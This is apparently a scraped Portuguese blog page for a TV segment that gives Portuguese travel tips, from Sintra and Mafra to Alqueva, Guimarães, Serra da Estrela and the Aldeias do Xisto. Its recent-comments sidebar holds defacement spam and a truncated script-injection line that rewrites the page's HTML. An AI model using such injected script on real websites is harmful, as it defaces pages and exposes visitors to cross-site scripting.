Conheça todos os locais e atividades para fazer na Quinta da Regaleira.

E ainda outras histórias, locais e mitos em Sintra e uma exposição sobre Mortos.

Visite também o navio Escola Sagres.

 

 

Paulo Brilhante dá-nos as melhores dicas no "Escape: O Lado Bom da Vida"! Aproveite e disfrute...

 

Veja o vídeo aqui!


Tags:

Conheça as propostas para desfrutar o melhor do nosso País! Saiba tudo sobre os Trilhos Verdes do Alto Minho. Descubra como tornar este passeio numa aventura, a pé ou de bicicleta...

 

www.diver.com.pt

 

www.escape.pt

 

Veja o vídeo aqui!


Tags:

Paulo Brilhante estará connosco, para nos revelar os melhores locais do nosso País, para desfrutar do Verão, com as melhores escolhas, na rubrica "Escape: o lado bom da vida".


Tags:

Sabia que no Alentejo pode fazer "Bird Watching"?!

 

Paulo Brilhante e Gabriel Mendes, contam-nos tudo... no espaço "Escape: O Lado Bom da Vida".


Tags:

Às portas de Lisboa encontra-se este espaço único no país. A Tapada Nacional de Mafra foi criada para servir reis e rainhas, mas hoje é um verdadeiro oásis verde, com muita vida selvagem, atividades para os mais novos e espaços de puro lazer. Ideal para um passeio pela chamada região saloia…

http://escape.sapo.pt/boa-vida/roteiros/passeio-verde-aventura-selvagem-na-tapada-mafra-3708828


Tags:

Depois do reconhecimento do nosso património natural (Sintra, Douro) e do nosso património edificado (centros históricos de Évora, Porto) e do Fado, enquanto património imaterial, a UNESCO, neste caso em conjunto com a Organização Mundial do Turismo, distinguiram a Reserva Dark Sky Alqueva como a primeira reserva do mundo com a certificação Starlight Tourism Destination.

Trata-se do reconhecimento das características únicas do céu noturno naquela região alentejana, num importante incentivo ao turismo.


Tags:

2012 é o ano de Guimarães, que assume na plenitude o título de Capital Europeia da Cultura. Um processo dinâmico que já começou e que terá inauguração oficial a 21 de janeiro com um grande espetáculo.

A cidade que, em 1128, assistiu e foi sede da fundação da nacionalidade portuguesa e do reconhecimento de D. Afonso Henriques como primeiro Rei de Portugal, mostra agora a sua vertente cultural a nível europeu. Recorde-se que em 2001, o centro histórico da cidade foi reconhecido pela UNESCO, como Património Cultural da Humanidade.

Que melhor desculpa poderia ter para visitar uma cidade, onde o passado (património e tradições) convive na perfeição com a natureza envolvente e o dinamismo de uma população jovem que faz de Guimarães, um espaço cosmopolita e moderno.


Tags:

Esta semana, em Escape: O Lado Bom da Vida, vamos apresentar algumas sugestões para um Natal, no mínimo… diferente.

“Rapta-me”: Esta pode ser a experiência que procura para surpreender a sua cara-metade. Um presente original e ousado da empresa Pecado Original que promete ainda outras aventuras Nas Asas do Desejo.

Esta semana, saiba que voar pode ser mesmo o presente ideal, seja para o namorado/a, marido/mulher ou para os seus filhos. Aceite o Desafio e voe a preço custo.

Outra sugestão de presente de Natal é apresentada pelas Pousadas de Portugal. Um voucher que é um convite para uma Grande História de Amor. E como também se aproxima o fim de ano, escape.pt sugere diversos locais onde pode celebrar a chegada de 2012 a Custo Zero!


Tags:

Destino nacional de eleição para quem gosta de neve. Mas, há muito mais para descobrir porque a Serra da Estrela é um convite permanente de descoberta, seja inverno ou verão, esteja ou não, coberta de neve.

Não pense que uma ida à neve se resume a subir até ao alto da Torre, atirar umas bolas de neve, escorregar na neve e comprar uma recordação na loja…

A Estrela tem muito para descobrir. Da fantástica beleza natural (com ou sem o manto de neve), com destaque para os vales glaciares e as suas lagoas, até ao património, como a rota dos castelos que recorda os primeiros dias de Portugal e as Aldeias Históricas que guardam muitos dos segredos gastronómicos da região, como o queijo da serra.

Não deixe de visitar os principais museus da região, seja o Judaico em Belmonte, seja o novíssimo Museu dos Lanifícios, na Covilhã.

Existem ainda muitas atividades para fazer com a família ou com os amigos, seja o esqui ou o snowboard, mergulho nos lagos gelados, BTT e caminhadas…


Tags:

Esta semana, vamos falar das Aldeias do Xisto. São 27 as Aldeias do Xisto distribuídas pela Região Centro, num território de enorme beleza que oferece experiências únicas. Na produção gastronómica, no artesanato, no alojamento e na animação cultural, as Aldeias do Xisto destacam-se pela apresentação de produtos, serviços e profissionais de excelência.

Das coisas da terra fazem-se novos produtos. Um rio faz-se pista de canoagem. Uma floresta faz-se trilho para caminhadas. Uma tradição antiga transforma-se num evento cultural único. Há praias fluviais de água puríssima, monumentos, castelos e museus para ver. Dá gosto falar com as pessoas e partilhar as suas tradições, artes e histórias. E com base no imaginário rural criam-se objectos de design inovador disponíveis na Rede de Lojas das Aldeias do Xisto.

Faça parte do desafio. Descubra uma Região que é um tesouro nacional através da Rede das Aldeias do Xisto.


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO